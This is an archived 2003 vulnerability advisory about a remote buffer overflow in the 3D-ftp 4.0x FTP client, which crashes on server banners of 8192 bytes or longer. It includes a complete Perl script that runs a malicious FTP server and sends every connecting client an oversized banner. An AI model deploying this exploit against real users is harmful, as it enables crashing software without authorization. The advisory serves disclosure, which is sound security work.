logo Home

Untitled Document

Home > Archives Advisories > Articles


Untitled Document

Untitled Document

Buffer overflow in 3D-ftp
Date: 2003-04-28

Author : Over_G <overg@mail.ru>

Product: 3D-ftp Client
Version: 4.0x
OffSite: http://www.sitegallery.net/
Problem: Remote buffer overflow
------------------------------------------

3D-ftp - Quite good Windows FTP Client. FTP Client have many opportunities

Remote buffer overflow will take place if server send long banner >= 8192
Client can not process these data and he is crash!

Fix: Download new version.

Sample exploit in perl. For Crash 3D-ftp use: ftpbanex.pl 8193


#!/usr/bin/perl
########################################################
#
# Banner Buffer Overflow remote exploit in FTP Clients
#
#
# by Over_G [DWC Gr0up]
#
# www.dwcgr0up.com www.overg.com
#########################################################
use IO::Socket;
$port = "21";
$data = "a";
$bsize = $ARGV[0];

print "\n Banner Buffer Overflow remote exploit in FTP Clients\n\n";
print " by Over G[DWC Gr0up]\n";
print " www.dwcgr0up.com www.overg.com\n\n";

if (defined $bsize) {}
else {
print "Incorrect parameters.\n";
die "Usage: perl ftpbanex.pl [buffer_size]\n";
}
print "Creating server...\n";
$buf .= $data x $bsize;
$server = IO::Socket::INET->new(LocalPort => $port, Type =>
SOCK_STREAM, Reuse => 1, Listen => 2)
or die "Couldn't create server.\n";
print "Awayting connections...\n";
while ($client = $server->accept())
{
print "Client connected.\n";
print "Attacking...";
print $client "$buf";
print "OK\n";
close($client);
}

Greetz to: DHGroup, Gipshack.

www.overg.com www.dwcgr0up.com
regards, Over G[DWC Gr0up]





 

arrowSearch Advisories

arrowNewsletter

Free weekly Newsletter.

Please enter your email address here:
arrowReport Vulnerability

If you've found a vulnerability please
click here to report it.
arrowPartners

newsnow

About Us | Contact Us | Advertise | email | Backend flag
Copyright © 2016-2017 Security Corporation - All Rights Reserved - Legal - Privacy Policy